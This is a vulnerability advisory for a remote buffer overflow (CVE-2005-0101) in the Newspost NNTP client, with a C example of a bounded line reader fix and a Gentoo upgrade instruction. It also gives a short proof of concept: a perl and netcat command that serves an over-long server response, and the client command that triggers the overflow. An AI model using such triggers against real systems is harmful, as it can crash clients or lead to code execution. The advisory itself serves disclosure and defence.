Newspost Remote Buffer Overflow Vulnerability
BID:12418
Info
| Bugtraq ID: | 12418 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2005-0101 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 01 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this vulnerability is credited to Niels Heinen. |
| Vulnerable: | Newspost Newspost 2.1.1; Newspost Newspost 2.0 |
| Not Vulnerable: | |
Discussion
Newspost is prone to a remote buffer overflow vulnerability due to an unbounded memory copy operation.
The problem occurs in the 'socket_getline()' function of 'socket.c' when the vulnerable client handles NNTP server responses.
Successful exploitation of this issue could potentially lead to arbitrary code execution.
This issue was reported to affect Newspost 2.1.1 and prior; other versions may also be vulnerable.
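The class of fix for an unbounded line read, as an added example (not Newspost's source and not part of the original advisory): a line reader that enforces the buffer size and rejects an over-long NNTP response. The names `bounded_getline`, `read_response`, `poc_result` and the 1024-byte buffer size are assumptions, and a pipe stands in for the server socket with constructed sample responses.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define LINE_CAP    1024   /* assumed size of the client's response buffer */
#define ERR_IO      (-1L)
#define ERR_TOOLONG (-2L)

static char line_buf[LINE_CAP];

/* Read one line from fd into buf (cap bytes). Unlike a loop that stores
 * bytes until '\n' with no length check, this stops at cap-1 bytes. */
long bounded_getline(int fd, char *buf, size_t cap)
{
    size_t n = 0;
    char c;
    ssize_t r;
    if (cap == 0) return ERR_IO;
    while ((r = read(fd, &c, 1)) == 1 && c != '\n') {
        if (n + 1 >= cap) {            /* no room left for byte + NUL */
            buf[n] = '\0';
            return ERR_TOOLONG;        /* caller should drop the connection */
        }
        buf[n++] = c;
    }
    if (r < 0) { buf[0] = '\0'; return ERR_IO; }
    if (n > 0 && buf[n - 1] == '\r') n--;   /* NNTP lines end in CRLF */
    buf[n] = '\0';
    return (long)n;
}

/* Serve `data` over a pipe standing in for the NNTP socket, then read it. */
long read_response(const char *data, size_t len)
{
    int p[2];
    long r;
    if (pipe(p) != 0) return ERR_IO;
    if (write(p[1], data, len) != (ssize_t)len) { close(p[0]); close(p[1]); return ERR_IO; }
    close(p[1]);
    r = bounded_getline(p[0], line_buf, sizeof line_buf);
    close(p[0]);
    return r;
}

/* Constructed input with the same shape as the advisory's trigger:
 * 1024 filler bytes plus 16 more, with no line terminator. */
long poc_result(void)
{
    char resp[1024 + 16];
    memset(resp, 'A', 1024);
    memcpy(resp + 1024, "BBBBCCCCDDDDEEEE", 16);
    return read_response(resp, sizeof resp);
}

int main(void)
{
    printf("normal: %ld\n", read_response("200 server ready\r\n", 18));
    printf("over-long: %ld\n", poc_result());
    return 0;
}
```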
Exploit / POC
No exploit is available; however, a proof of concept to trigger the issue is available:
Create a server:
perl -e 'print "A" x 1024;print "BBBBCCCCDDDDEEEE"'| nc -v -l -p 119
Connect to it:
newspost -s test -i localhost -f [email protected] -n news.news /etc/hosts
Solution / Fix
Solution:
Gentoo Linux has released an advisory dealing with this issue. Gentoo advises that all Newspost users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nntp/newspost-2.0-r1"
For more information, please see the referenced Gentoo advisory.
References
References:
- Bug description (Niels Heinen)
- Newspost Homepage (Newspost)